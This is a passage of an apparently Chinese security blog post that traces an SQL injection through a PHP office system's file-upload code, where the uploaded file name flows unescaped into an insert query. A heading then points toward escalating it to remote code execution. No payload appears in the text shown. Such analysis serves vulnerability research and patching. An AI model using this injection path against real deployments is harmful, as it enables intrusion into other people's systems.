h7o7kz1F1XfM9ve2zUxD15IWxhi0LaI6QOXGeevE1kR3oEV0rsVKLb0+qIir3FB3n2lbH9IaGGAcybbpj/YSRzBgKxJ63V1giLfSQDO1j7xJ7mCMXW8xDnVZSQt83Ll0sKMiLm3AdpmIJU8ANxsGck8scUx8gjsALPdqWW56hAEdB7AOqVZXg4k2jUl9JX7A+VoaujqU3vTpPL2lgK5Z/zDH6UtZc2q9RgdxuHhk36uyo36Kionqq+4BTygjPVsf8vSWAsUN1+x7oAFjHLryktuitbdaf26jlrcPYM/d74+tJ4wZUAuzzqNUxAH21QObiotqTn95A34hk/2tvTTyV08zdq74q75GTOzKWqZj3nHyXy/2GqH0ClsvV0mg+ajGNBWlvtMA5m18byu9wnb7K20va6rBmB18nlJ6jJjmE9BxYKv0GKH0GCE3/jFkpNJjRNuzrPn8Rzch8Yn70CdA6TFC6RWWETR/sYcdBsXWW9Qzq1ExUX1hox6e4+P9Rio9RkzzCZvmYVN78+tKdBDHyX89zWOE0itsfbBKAs1pO3xkAACXiLhEZDrSGDcuEbXPl/WtrHFYynyfMLzoxiUiwwvuBglH29D1qwdMZ2j9aWEdchDT3RddBJs99MELblwi4k+7t2z2NJW1XLO1qNjhZsDNsOIJg0TEn3Y3ZHkA99lZW89VxZnLNRg96Zkxll/WvhmFOBLra6/FjQj3fymOMdxRZ5e2b25gjcc36eev8YnL84HujvqjipKX/VXmZdXZdd2XNdXQfD7rhnjd6JjtYgauztabdopwj7B1bRfGAnHKuDi0L2sCyNccgp/q5dEx230YeIPu5oX99jgX1ltkkdWo1DW5mzxi1vjEhfsAdxqy72jQXG+1vaz5/KJSrJer1owVAOj0F5Zq7HNhLJe4t2R5GPesMYAvH8oB3rroaYeyf21mvh589lDDbPDaB6LrLdAZ+AR3zn8SnTVbLWdf3Weqx9sGsGzrbbz4OJ/laZjNOH+Ai/c6fyB3V7PVqJjuvts6GFZ48Dcf5wAvueu2tRcXxrKqI5s/CfnL3KSEMz1e2cqn/P61iezLLXQ1mMNh02Pn9/Rcp520xGVsyvoPABv/vHewA3EOHe/EGZmybVXY5S0rtxd2SXatF/9nLu1yVSwZdHQ1GCG9cDIrc8v5kFWv/1ZhvouAG8anbp2B8x9SmnNMg3OFPyFOiolqCjcuq5Z3XoFloguZK2sZXQHmqCxlOrU+d6kevd1bS4jLq+xuno7SnCOzlOksXKJECCFOxNKKBHFh9N1gtqPvBnMBLGjshMGOgRBC+hetvRJCXB9lOkKI67Mp0/HAaVsP513+Ov+zP1q96o8QQhyO9f10nPuv3LgmAmd3p+49/rnGvt9CQgghA8CWncMKhQzVe/a+c6yC0hwhxBnRPB0hxPXZkukqK6sh81cMQDSEENIfrGc6xirU1QMSCyGE9A+bR68yeaDN92gkhBCHYj3TBQYujp4CVFeV0XIEIcQ5WVp75YGLj3wcJ2esquhg3Mp8WnglhDgptxEj/Xp6jv3z0qWi4ss/eoc+9+uk4Nr3cyoHNjZCCLEPK/vpysoqysrS4Z+XKZMHck4DWEKIM7J5RYLm6QghTst6puPcX5ANSCyEENI/bOnTKRQyVFfQJB0hxFnZOnqV+U+l/XSEECdlyzUSJ7alna2eEnfo0gm6axMhxBn14u7qPNA/6KqG1iUIIU6nF/cyYWUVlOYIIc6I7tpECHF9lOkIIa7PLNONGjVy8CIhhJD+Qn06Qojrc+hMJ45eNn2JMNhREEKcnkNnOsgjpDLlYAdBCHF6tnw3mDPhQqygQEPucX3PG2I4j43ely7F/k8T3rPwsv5jCr
<p blockindex=15>且其功能点说明是上传文件(webmain/task/api/uploawAction.php),我们着重看一下怎么个事</p>
<pre blockindex=16><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>uploawAction</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$_FILES</span>)<span class=hljs-keyword>exit</span>(<span class=hljs-string>'sorry!'</span>);
<span class=hljs-variable>$upimg</span> = c(<span class=hljs-string>'upfile'</span>);
<span class=hljs-variable>$maxsize</span>= (<span class=hljs-keyword>int</span>)<span class=hljs-keyword>$this</span>-&gt;get(<span class=hljs-string>'maxsize'</span>, <span class=hljs-variable>$upimg</span>-&gt;getmaxzhao());<span class=hljs-comment>//上传最大M</span>
<span class=hljs-variable>$uptypes</span>= <span class=hljs-string>'jpg|png|docx|doc|pdf|xlsx|xls|zip|rar'</span>;
<span class=hljs-variable>$upimg</span>-&gt;initupfile(<span class=hljs-variable>$uptypes</span>, <span class=hljs-string>''</span>.UPDIR.<span class=hljs-string>'|'</span>.date(<span class=hljs-string>'Y-m'</span>).<span class=hljs-string>''</span>, <span class=hljs-variable>$maxsize</span>);
<span class=hljs-variable>$upses</span> = <span class=hljs-variable>$upimg</span>-&gt;up(<span class=hljs-string>'file'</span>);
<span class=hljs-keyword>if</span>(!is_array(<span class=hljs-variable>$upses</span>))<span class=hljs-keyword>exit</span>(<span class=hljs-variable>$upses</span>);
<span class=hljs-variable>$arr</span> = c(<span class=hljs-string>'down'</span>)-&gt;uploadback(<span class=hljs-variable>$upses</span>);
<span class=hljs-variable>$arr</span>[<span class=hljs-string>'autoup'</span>] = (getconfig(<span class=hljs-string>'qcloudCos_autoup'</span>) || getconfig(<span class=hljs-string>'alioss_autoup'</span>)) ? <span class=hljs-number>1</span> : <span class=hljs-number>0</span>; <span class=hljs-comment>//是否上传其他平台</span>
<span class=hljs-keyword>return</span> <span class=hljs-variable>$arr</span>;
}
</code></pre>
<p blockindex=17>该方法主要是定义了白名单上传后缀 <code>$uptypes</code>,调用 up 方法进行上传后返回文件信息,然后调用 <code>uploadback</code>,跟进到其中</p>
<pre blockindex=18><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>uploadback</span>(<span class=hljs-params><span class=hljs-variable>$upses</span>, <span class=hljs-variable>$thumbnail</span>=<span class=hljs-string>''</span>, <span class=hljs-variable>$subo</span>=<span class=hljs-literal>true</span></span>)
</span>{
<span class=hljs-variable>$msg</span> = <span class=hljs-string>''</span>;
<span class=hljs-variable>$data</span> = <span class=hljs-keyword>array</span>();
<span class=hljs-keyword>if</span>(is_array(<span class=hljs-variable>$upses</span>)){
<span class=hljs-variable>$fileext</span>= substr(<span class=hljs-variable>$upses</span>[<span class=hljs-string>'fileext'</span>],<span class=hljs-number>0</span>,<span class=hljs-number>10</span>);
<span class=hljs-variable>$arrs</span> = <span class=hljs-keyword>array</span>(
<span class=hljs-string>'adddt'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;rock-&gt;now,
<span class=hljs-string>'valid'</span> =&gt; <span class=hljs-number>1</span>,
<span class=hljs-string>'filename'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;replacefile(<span class=hljs-variable>$upses</span>[<span class=hljs-string>'oldfilename'</span>]),
<span class=hljs-string>'web'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;rock-&gt;web,
<span class=hljs-string>'ip'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;rock-&gt;ip,
<span class=hljs-string>'mknum'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;rock-&gt;get(<span class=hljs-string>'sysmodenum'</span>),
<span class=hljs-comment>//'mid' =&gt; $this-&gt;rock-&gt;get('sysmid','0'),</span>
<span class=hljs-string>'fileext'</span> =&gt; <span class=hljs-variable>$fileext</span>,
<span class=hljs-string>'filesize'</span> =&gt; (<span class=hljs-keyword>int</span>)<span class=hljs-keyword>$this</span>-&gt;rock-&gt;get(<span class=hljs-string>'filesize'</span>, <span class=hljs-variable>$upses</span>[<span class=hljs-string>'filesize'</span>]),
<span class=hljs-string>'filesizecn'</span>=&gt; <span class=hljs-variable>$upses</span>[<span class=hljs-string>'filesizecn'</span>],
<span class=hljs-string>'filepath'</span> =&gt; str_replace(<span class=hljs-string>'../'</span>,<span class=hljs-string>''</span>,<span class=hljs-variable>$upses</span>[<span class=hljs-string>'allfilename'</span>]),
<span class=hljs-string>'optid'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;adminid,
<span class=hljs-string>'optname'</span> =&gt; <span class=hljs-keyword>$this</span>-&gt;adminname,
<span class=hljs-string>'comid'</span> =&gt; m(<span class=hljs-string>'admin'</span>)-&gt;getcompanyid(),
);
<span class=hljs-variable>$arrs</span>[<span class=hljs-string>'filetype'</span>] = m(<span class=hljs-string>'file'</span>)-&gt;getmime(<span class=hljs-variable>$fileext</span>);
<span class=hljs-comment>//判断是不是需要压缩jpg和jpeg</span>
...
<span class=hljs-variable>$bo</span> = <span class=hljs-keyword>$this</span>-&gt;db-&gt;record(<span class=hljs-string>'[Q]file'</span>,<span class=hljs-variable>$arrs</span>);
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$bo</span>)<span class=hljs-keyword>$this</span>-&gt;reutnmsg(<span class=hljs-keyword>$this</span>-&gt;db-&gt;error());
<span class=hljs-variable>$id</span> = <span class=hljs-keyword>$this</span>-&gt;db-&gt;insert_id();
}
</code></pre>
<p blockindex=19>该方法主要是通过之前 <code>up</code> 方法上传文件返回的数组 <code>$upses</code> 和全局配置信息构造 <code>$arrs</code>,然后调用 <code>$this-&gt;db-&gt;record</code> 方法操作 <code>$arrs</code></p>
<p blockindex=20>来到 <code>record</code> 方法</p>
<pre blockindex=21><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>record</span>(<span class=hljs-params><span class=hljs-variable>$table</span>,<span class=hljs-variable>$array</span>,<span class=hljs-variable>$where</span>=<span class=hljs-string>''</span></span>)
</span>{
<span class=hljs-variable>$addbool</span> = <span class=hljs-literal>true</span>;
<span class=hljs-keyword>if</span>(!<span class=hljs-keyword>$this</span>-&gt;isempt(<span class=hljs-variable>$where</span>))<span class=hljs-variable>$addbool</span>=<span class=hljs-literal>false</span>;
<span class=hljs-variable>$cont</span> = <span class=hljs-string>''</span>;
<span class=hljs-keyword>if</span>(is_array(<span class=hljs-variable>$array</span>)){
<span class=hljs-keyword>foreach</span>(<span class=hljs-variable>$array</span> <span class=hljs-keyword>as</span> <span class=hljs-variable>$key</span>=&gt;<span class=hljs-variable>$val</span>){
<span class=hljs-variable>$cont</span>.=<span class=hljs-string>",`<span class=hljs-subst>$key</span>`="</span>.<span class=hljs-keyword>$this</span>-&gt;toaddval(<span class=hljs-variable>$val</span>).<span class=hljs-string>""</span>;
}
<span class=hljs-variable>$cont</span> = substr(<span class=hljs-variable>$cont</span>,<span class=hljs-number>1</span>);
}<span class=hljs-keyword>else</span>{
<span class=hljs-variable>$cont</span> = <span class=hljs-variable>$array</span>;
}
<span class=hljs-variable>$table</span> = <span class=hljs-keyword>$this</span>-&gt;gettables(<span class=hljs-variable>$table</span>);
<span class=hljs-keyword>if</span>(<span class=hljs-variable>$addbool</span>){
<span class=hljs-variable>$sql</span>=<span class=hljs-string>"insert into <span class=hljs-subst>$table</span> set <span class=hljs-subst>$cont</span>"</span>;
}<span class=hljs-keyword>else</span>{
<span class=hljs-variable>$where</span> = <span class=hljs-keyword>$this</span>-&gt;getwhere(<span class=hljs-variable>$where</span>);
<span class=hljs-variable>$sql</span>=<span class=hljs-string>"update <span class=hljs-subst>$table</span> set <span class=hljs-subst>$cont</span> where <span class=hljs-subst>$where</span>"</span>;
}
<span class=hljs-keyword>return</span> <span class=hljs-keyword>$this</span>-&gt;tranbegin(<span class=hljs-variable>$sql</span>);
}
</code></pre>
<p blockindex=22>这里就直接操作 <code>$array</code><code>key=value</code> 格式然后逗号拼接后带入到 SQL 语句中执行</p>
<p blockindex=23>控制了$array 中的内容就能实现 SQL 注入,而其中<code>filename</code><code>filepath</code><code>filetype</code>等这几个键的内容是通过上传文件获取到的,那我们对上传文件名做文章是不是就可以造成 sql 注入呢。</p>
<pre blockindex=24><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>up</span>(<span class=hljs-params><span class=hljs-variable>$name</span>,<span class=hljs-variable>$cfile</span>=<span class=hljs-string>''</span></span>)
</span>{
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$_FILES</span>)<span class=hljs-keyword>return</span> <span class=hljs-string>'sorry!'</span>;
<span class=hljs-variable>$file_name</span> = <span class=hljs-variable>$_FILES</span>[<span class=hljs-variable>$name</span>][<span class=hljs-string>'name'</span>];
<span class=hljs-variable>$file_size</span> = <span class=hljs-variable>$_FILES</span>[<span class=hljs-variable>$name</span>][<span class=hljs-string>'size'</span>];<span class=hljs-comment>//字节</span>
<span class=hljs-variable>$file_type</span> = <span class=hljs-variable>$_FILES</span>[<span class=hljs-variable>$name</span>][<span class=hljs-string>'type'</span>];
<span class=hljs-variable>$file_error</span> = <span class=hljs-variable>$_FILES</span>[<span class=hljs-variable>$name</span>][<span class=hljs-string>'error'</span>];
<span class=hljs-variable>$file_tmp_name</span> = <span class=hljs-variable>$_FILES</span>[<span class=hljs-variable>$name</span>][<span class=hljs-string>'tmp_name'</span>];
<span class=hljs-variable>$zongmax</span> = <span class=hljs-keyword>$this</span>-&gt;getmaxupsize();
<span class=hljs-keyword>if</span>(<span class=hljs-variable>$file_size</span>&lt;=<span class=hljs-number>0</span> || <span class=hljs-variable>$file_size</span> &gt; <span class=hljs-variable>$zongmax</span>){
<span class=hljs-keyword>return</span> <span class=hljs-string>'文件为0字节/超过'</span>.<span class=hljs-keyword>$this</span>-&gt;formatsize(<span class=hljs-variable>$zongmax</span>).<span class=hljs-string>',不能上传'</span>;
}
...
<span class=hljs-keyword>return</span> <span class=hljs-keyword>array</span>(
<span class=hljs-string>'newfilename'</span> =&gt; <span class=hljs-variable>$file_newname</span>,
<span class=hljs-string>'oldfilename'</span> =&gt; <span class=hljs-variable>$file_name</span>,
<span class=hljs-string>'filesize'</span> =&gt; <span class=hljs-variable>$file_size</span>,
<span class=hljs-string>'filesizecn'</span> =&gt; <span class=hljs-variable>$file_sizecn</span>,
<span class=hljs-string>'filetype'</span> =&gt; <span class=hljs-variable>$file_type</span>,
<span class=hljs-string>'filepath'</span> =&gt; <span class=hljs-variable>$save_path</span>,
<span class=hljs-string>'fileext'</span> =&gt; <span class=hljs-variable>$file_ext</span>,
<span class=hljs-string>'allfilename'</span> =&gt; <span class=hljs-variable>$allfilename</span>,
<span class=hljs-string>'picw'</span> =&gt; <span class=hljs-variable>$picw</span>,
<span class=hljs-string>'pich'</span> =&gt; <span class=hljs-variable>$pich</span>
);
}<span class=hljs-keyword>else</span>{
<span class=hljs-keyword>return</span> <span class=hljs-string>'上传失败:'</span>.<span class=hljs-keyword>$this</span>-&gt;geterrmsg(<span class=hljs-variable>$file_error</span>).<span class=hljs-string>''</span>;
}
}
</code></pre>
<p blockindex=25>通过 <code>up</code> 方法的返回值构造可以看到 <code>oldname</code> 其实就是上传文件的文件名,这也证实我们的想法。</p>
<h3 blockindex=26>2.2 漏洞复现</h3>
<p blockindex=27><img src="data:image/png;base64,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
<h2 blockindex=28>0x03 扩大危害 RCE</h2>
<h4 blockindex=29>3.1 漏洞点</h4>
<p blockindex=30>该 cms 自己实现了写入文件接口,我们查看其用法中写入</p>
<p blockindex=31><img src=data:image/png;base64,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